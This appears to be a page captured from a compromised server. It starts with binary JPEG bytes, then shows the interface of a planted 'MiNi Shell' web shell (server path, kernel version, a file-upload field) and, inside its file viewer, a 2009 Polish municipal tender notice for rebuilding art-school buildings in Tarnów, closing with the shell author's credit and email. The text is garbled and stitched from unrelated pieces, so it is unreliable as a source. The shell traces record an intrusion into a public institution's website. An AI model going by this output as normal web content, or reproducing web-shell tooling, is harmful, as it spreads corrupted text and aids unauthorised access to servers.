JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090805/127715-N-2009.html

<p class="kh_header"><b>Tarnów: Rozbudowa i przebudowa budynków Zespołu Szkół Plastycznych w Tarnowie 
ul. Westwalewicza 6  ETAP II i III</b><br>
<b>Numer ogłoszenia: 127715 - 2009; data zamieszczenia: 05.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Tarnowa Wydział Realizacji Inwestycji , ul. Nowa 4/327, 33-100 Tarnów, woj. małopolskie, tel. 014 6882708, faks 014 6222833.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tarnow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa i przebudowa budynków Zespołu Szkół Plastycznych w Tarnowie 
ul. Westwalewicza 6  ETAP II i III.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 4.1. Zakresu robót wchodzących w skład ETAPU II i III obejmuje:
4.1.1.Roboty przygotowawcze placu budowy
a).  rozbiórka budynku magazynowego, garażowego, wiaty, rampy;
b).  rozbiórka ogrodzenia i placów ;
c).  wycinka drzew - Zamawiający posiada decyzję zgodę na wycięcie drzew;
d).  tablica informacyjna UE
4.1.2.Roboty w zakresie elementów zewnętrznych
a).  drogi, chodniki, place, parkingi;
b).  przyłącz kanalizacji sanitarnej ;
c).  przyłącz kanalizacji deszczowej ;
d).  zewnętrzny odcinek wewnętrznej instalacji  gazu od bud. nr 3 do bud.nr 5;
e).  oświetlenie terenu, zalicznikowe linie kablowe;
f).  ogrodzenie terenu;
g).  tyczenie i  inwentaryzacja geodezyjna;
h). nasadzenia, zakładanie trawników, rekultywacja terenu, usuwanie uzbrojenia podziemnego 
      odkopanego w trakcie robót ziemnych przeznaczonego do  demontażu,
i).  uzyskanie zezwolenia na zajęcie pasa drogowego na czas trwania realizacji robót.
4.1.3.Roboty  budowlane polegające na budowie 
      a).BUDYNEK  Nr 5 
   Budynek o rzucie prostokąta o wymiarach 31.18 m (wsch-zach) x 30.46m, z ryzalitem    
przedłużającym ścianę północną o wymiarach 3.13m  x 17.68m, zawierający w części  południowej   ewakuacyjną klatkę  schodową.
Budynek składać się będzie z dwóch wydzielonych stref :
-parterowa część południowa zawierająca salę gimnastyczną z zapleczem magazynowym, siłownią, pomieszczeniami socjalnymi, sanitariatami, przebieralniami, pomieszczeniem wymiennikowi. 
-piętrowa część północna zawierająca pomieszczenia dydaktyczne: pracownie projektowe reklamy, pracownie malarskie , zaplecza magazynowe.

DANE TECHNICZNE:
Powierzchnia zabudowy  budynku proj.                                          1022,44 m2,
Powierzchnia całkowita  budynku proj.                                           1392,86 m2,
Powierzchnia użytkowa  budynku	                            	            1239,75 m2
Kubatura        			  	                                      9276,00 m3



       b). BUDYNKI NR 6 i 7
Budynki nr 6 i 7 przeznaczone na  warsztaty stolarskie, pracownię fotograficzną, pracownię malarską, magazyn zewn., garaż dla samochodu dostawczego oraz wiatę na drewno stolarskie. Do segmentu 7 od północy dobudowa zadaszenia śmietnika. 
Uwolnienie terenu pod budowę budynków nr 6 i 7 wymaga wyburzenia budynków zaplecza magazynowego, znajdujących się na działkach i rozbiórki nawierzchni twardych przy  budynkach. Nastąpi także likwidacja części istniejącego uzbrojenia podziemnego. 
Budynek nr 6 zostanie dobudowany od wschodu do budynku nr 5.

Budynek nr 6.
Projektowany budynek o rzucie prostokąta o wymiarach 12.51m (wsch-zach) x 25.71m
DANE TECHNICZNE:
Powierzchnia zabudowy  budynku proj.                                          319,32 m2,
Powierzchnia całkowita  budynku proj.                                           638,64 m2,
Powierzchnia użytkowa  budynku	                                      	          557,21 m2
Kubatura        			  	                                   1185,00 m3
Budynek nr 7.
Projektowany budynek garażowo - magazynowy usytuowany będzie po północnej stronie budynku nr 6. Projektowany budynek o rzucie prostokąta o wymiarach 8.25m (wsch-zach) x 15.15m , wiata na śmietniki 3.0m x 2.1 m. 
DANE TECHNICZNE:
Powierzchnia zabudowy  budynku proj.                                          124,99 m2,
Powierzchnia całkowita  budynku proj.                                           124,99 m2,
Powierzchnia użytkowa  budynku	                                      	          108,45 m2
Kubatura        			  	                                    545,00 m3,
Wiata nad śmietnikami
Dach pulpitowy o konstrukcji drewnianej zamocowany na północnej ścianie budynku 7, podparty dwoma słupami mur.
Powierzchnia zabudowy                         			                                  6,3 m2,
Powierzchnia wewnętrzna                                                                    		         5,5 m2
Zakres robót:
a).  roboty budowlane - wykonanie bud. Nr 5, 6, 7 wraz z instalacjami:
b).  instalacja co;
c).  instalacja wentylacji mechanicznej;
d).  instalacja gazowa ;
e).  instalacja wod-kan;
f).  instalacje elektryczne;
g).  instalacje teletechniczne;
h).  instalacja AKPiA;
i).  dostawa i montaż wyposażenia;
j).  połączenie budynku nr 4 z budynkiem nr 5 ;
k). przebudowa tymczasowego węzła rozdzielczego w szatni bud nr.4
4.1.4.Roboty  budowlane polegające na przebudowie 
BUDYNKU   NR 1 i 2
Budynki 1 i 2 są obiektami około stuletnimi. Budynek nr 1 posiada 3 kondygnacje nadziemne, podpiwniczenie w części południowo wschodniej oraz nieużytkowy strych.  
Po południowej stronie korytarza otwarta klatka schodowa łącząca wszystkie kondygnacje. Konstrukcja budynku tradycyjna ściany murowane z cegły pełnej. Schody na belkach stalowych, obudowanych, stropy nad parterem sklepienia odcinkowe na belkach stalowych, nad korytarzami nad parterem sklepienia z cegły krzyżowej, w ścianach korytarzowych przesklepienie otworów łukami. Nad I piętrem w trakcie korytarzowym stropy ciężkie 
w pozostałych pomieszczeniach stropy na konstrukcji drewnianej, nad II piętrem stropy na konstrukcji drewnianej. Dach dwuspadowy, w części południowo - zachodniej czterospadowy.
Budynek nr 2 posiada 2 kondygnacje nadziemne z częściowo użytkowym poddaszem, całkowicie podpiwniczony. Konstrukcja budynku tradycyjna murowana z cegły pełnej.  Nad piwnicami sklepienia ceglane nad parterem i piętrem stropy drewniane. Biegi schodowe żelbetowe. Konstrukcja dachu płatwiowo - kleszczowa. Budynki 1 i 2 na poziomie piętra połączone przewiązką na konstrukcji żelbetowej przekrytą stropodachem wentylowanym.
Zakres robót:
- izolacje przeciwwilgociowe, termiczne, akustyczne, drenaż opaskowy,
- wymiana stropów na I i II piętrem,
- poszerzenie otworów  w trakcie korytarzowym,
- wykonanie dodatkowych otworów drzwiowych i okiennych,
- przebicia  dla pionów  wentylacji  grawitacyjnej,
- zamurowania  otworów,
- budowa ścian działowych,
            - przebudowa klatki schodowej,
- uzupełnienia stropów,
- wymiana stolarki okiennej i drzwiowej,
- częściowa wymiana więźby dachowej,
- wymiana pokrycia dachowego,
- włączenie do bud. Nr 4
           W ramach przebudowy przewiduje się całkowitą wymianę istniejących i uzupełnienie nowymi  
            instalacjami:
-	instalację wody zimnej 
-	instalację wody ciepłej,
-	instalację centralnego ogrzewania,
-	instalację wentylacji grawitacyjnej,
-	instalację kanalizacji sanitarnej,
-	instalację kanalizacji deszczowej,
-	instalację elektryczną gniazd wtykowych, 
-	instalację el. oświetlenia pomieszczeń, ewakuacyjną i awaryjną,
-	instalację odgromową i połączeń wyrównawczych,
-	instalację telefoniczna i komputerów (strukturalna),
-	instalację zasilania komputerów ,
-	monitoring CCTV,
-	instalacja dzwonkowa,
- inst. rozgłoszeniowa.

      Uwaga:  w trakcie realizacji zadania przez Wykonawcę zostaną  wykonane przez MPEC Tarnów :  
                     przyłącz co, demontaż  wymiennikowi w bud. nr 3 ;wymienikownia  i kotłownia gazowa 
                     w budynku nr 5..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.42.00-2, 45.00.00.00-7, 45.40.00.00-1, 45.30.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 200000 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu 
z postępowania na podstawie art. 24 ust.1 i 2 ustawy, spełniający warunki określone w art. 22 ust.1 ustawy Prawo zamówień publicznych. 
Ocena spełniania warunków wymaganych od Wykonawców odbędzie się w oparciu 
o dokumenty i oświadczenia załączone do oferty. 
W przetargu mogą wziąć udział Wykonawcy, którzy:
9.1 posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień 
Ocena spełnienia warunku odbędzie się na podstawie dokumentu oraz oświadczenia - pkt.VI.1 i 2 siwz.

9.2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym
 i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
a. O zamówienie mogą ubiegać się Wykonawcy, którzy zrealizowali w okresie ostatnich pięciu lat (liczy się data wpisu do dziennika budowy lub zgłoszenia o zakończeniu budowy) przed dniem wszczęcia postępowania o udzielenie zamówienia (ogłoszenia w Biuletynie Zamówień Publicznych), a jeżeli okres prowadzenia działalności jest krótszy w tym okresie min. 2 roboty budowlane polegające na budowie, przebudowie bądź remoncie budynków użyteczności publicznej, zamieszkania zbiorowego lub mieszkalnych wielorodzinnych o wartości nie mniej niż 3.000.000 zł każda. Przy czym należyte i nie budzące zastrzeżeń wykonanie zamówienia potwierdzone musi być dokumentami poświadczającymi, że roboty zostały wykonane należycie  i terminowo - np. referencje, protokoły odbioru końcowego, opinie zamawiających, na rzecz których zamówienia zostały zrealizowane. 
b. O zamówienie mogą ubiegać się Wykonawcy, którzy dysponują lub będą dysponować:
- kierownikiem budowy z uprawnieniami do kierowania robotami budowlanymi 
w specjalności konstrukcyjno - budowlanej z minimum 5 letnim doświadczeniem zawodowym jako kierownik budowy w tym doświadczenie w zakresie kierowania budową przynajmniej jednego obiektu budowlanego o kubaturze minimum 9.000 m3.
- kierownikiem robót instalacyjnych posiadającym uprawnienia budowlane z minimum 
3 letnim doświadczeniem zawodowym do kierowania robotami budowlanymi 
w specjalności instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych, kanalizacyjnych oraz w zakresie sieci kanalizacyjnych,  
- kierownikiem robót elektrycznych posiadającym uprawnienia budowlane z minimum 
3 letnim doświadczeniem zawodowym do kierowania robotami budowlanymi 
w specjalności instalacyjnej w zakresie sieci i instalacji elektrycznych, 
- kierownikiem robót drogowych posiadającym uprawnienia budowlane z minimum 
3 letnim doświadczeniem zawodowym do kierowania robotami drogowymi 
Osoby te muszą posiadać aktualny wpis na listę członków właściwej izby samorządu  zawodowego.
Ocena spełnienia warunków odbędzie się na podstawie oświadczenia i dokumentów - pkt.VI. 1, 3, 4 i 5 siwz .

9.3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
O zamówienie mogą ubiegać się Wykonawcy, którzy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę co najmniej 3.000 000 zł. oraz posiadają środki finansowe lub zdolność kredytową  min 3.000.000 zł 
Ocena spełnienia warunku odbędzie się na podstawie oświadczenia i dokumentu
- pkt.VI. 1 ,6,7 siwz.

9.4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Ocena spełnienia warunku odbędzie się na podstawie oświadczenia i dokumentów - pkt.VI. 1 - 8 siwz.

Ocena spełnienia warunków zostanie dokonana wg formuły spełnia - nie spełnia. Niespełnienie chociaż jednego warunku skutkować będzie wykluczeniem Wykonawców z postępowania 
i odrzuceniem oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a)	oświadczenie z art.22 ust.1 ustawy (wg zał.  nr 2).
b)	aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
c)	wykaz wykonanych robót budowlanych, w okresie ostatnich pięciu lat (liczy się data wpisu do dziennika budowy lub zgłoszenia zakończeniu budowy), przed dniem wszczęcia postępowania 
o udzielenie zamówienia (ogłoszenia w Biuletynie Zamówień Publicznych), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w zakresie wymaganym punktem IV.3.3.2.a, z podaniem przedmiotu zamówienia, ich wartości, zamawiających oraz daty i miejsca wykonania zamówienia (wg zał. nr 3) oraz dokumenty potwierdzające, że roboty te zostały wykonane należycie - np. referencje, protokoły odbioru końcowego, opinie zamawiających. 
d)	uprawnienia budowlane do kierowania robotami:
- w specjalności konstrukcyjno - budowlanej bez ograniczeń ,
- w specjalności instalacyjnej w zakresie instalacji i urządzeń cieplnych,     
  wentylacyjnych, gazowych, wod. -  kan. oraz w zakresie sieci kanalizacyjnych,  
- w specjalności instalacyjnej w zakresie sieci i instalacji elektrycznych,
- w specjalności konstrukcyjno - inżynieryjnej w zakresie dróg
Uprawnienia jak wyżej należy dołączyć z aktualnymi wpisami na listę członków właściwej izby samorządu zawodowego (pkt.IV.3.2.b SIWZ).
e)	wykaz osób, o których mowa (pkt.IV.3.2.b SIWZ) wraz z informacjami na temat kwalifikacji zawodowych, doświadczenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności (wg zał. nr 5). Do wykazu należy dołączyć pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wyżej wymienionym wykazie wykonawca wskazał osoby, którymi będzie dysponował. które zostaną udostępnione przez podmiot trzeci.
f)	polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
g)	informacja z banku lub spółdzielczej kasy oszczędnościowo-kredytowej w których wykonawca posiada rachunek potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy wystawiona nie wcześniej niż 3 miesiące przed terminem składania ofert,
h)	dowód wniesienia wadium..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://portal.tarnow.bip-gov.info.pl/bip/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Tarnowa, 33-100 Tarnów, ul. Nowa 4, pokój Nr 306.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.08.2009 godzina 10:00, miejsce: Urząd Miasta Tarnowa, 33-100 Tarnów, ul. Nowa 4, parter sala nr 1 - Biuro Obsługi Mieszkańców..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com